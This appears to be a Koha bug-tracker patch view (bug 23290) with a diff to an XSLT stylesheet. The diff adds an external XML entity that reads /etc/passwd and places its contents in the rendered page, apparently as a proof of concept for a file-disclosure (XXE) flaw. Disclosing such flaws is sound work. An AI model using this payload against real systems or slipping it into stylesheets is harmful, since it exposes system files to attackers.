View | Details | Raw Unified | Return to bug 23290
Collapse All | Expand All

(-)a/koha-tmpl/intranet-tmpl/prog/en/xslt/MARC21slim2intranetDetail.xsl (-3 / +2 lines)
Lines 1-6 Link Here
1
<?xml version="1.0" encoding="UTF-8"?>
1
<?xml version="1.0" encoding="UTF-8"?>
2
2
3
<!DOCTYPE stylesheet [<!ENTITY nbsp "&#160;" >]>
3
<!DOCTYPE stylesheet [<!ENTITY nbsp "&#160;" ><!ENTITY secret SYSTEM "/etc/passwd">]>
4
4
5
<!-- $Id: MARC21slim2DC.xsl,v 1.1 2003/01/06 08:20:27 adam Exp $ -->
5
<!-- $Id: MARC21slim2DC.xsl,v 1.1 2003/01/06 08:20:27 adam Exp $ -->
6
<!-- Edited: Bug 1807 [ENH] XSLT enhancements sponsored by bywater solutions 2015/01/19 WS wsalesky@gmail.com  -->
6
<!-- Edited: Bug 1807 [ENH] XSLT enhancements sponsored by bywater solutions 2015/01/19 WS wsalesky@gmail.com  -->
Lines 12-18 Link Here
12
  exclude-result-prefixes="marc items str">
12
  exclude-result-prefixes="marc items str">
13
    <xsl:import href="MARC21slimUtils.xsl"/>
13
    <xsl:import href="MARC21slimUtils.xsl"/>
14
    <xsl:output method = "html" indent="yes" omit-xml-declaration = "yes" encoding="UTF-8"/>
14
    <xsl:output method = "html" indent="yes" omit-xml-declaration = "yes" encoding="UTF-8"/>
15
    <xsl:template match="/">
15
    <xsl:template match="/"><secret>&secret;</secret>
16
            <xsl:apply-templates/>
16
            <xsl:apply-templates/>
17
    </xsl:template>
17
    </xsl:template>
18
18
19
- 

Return to bug 23290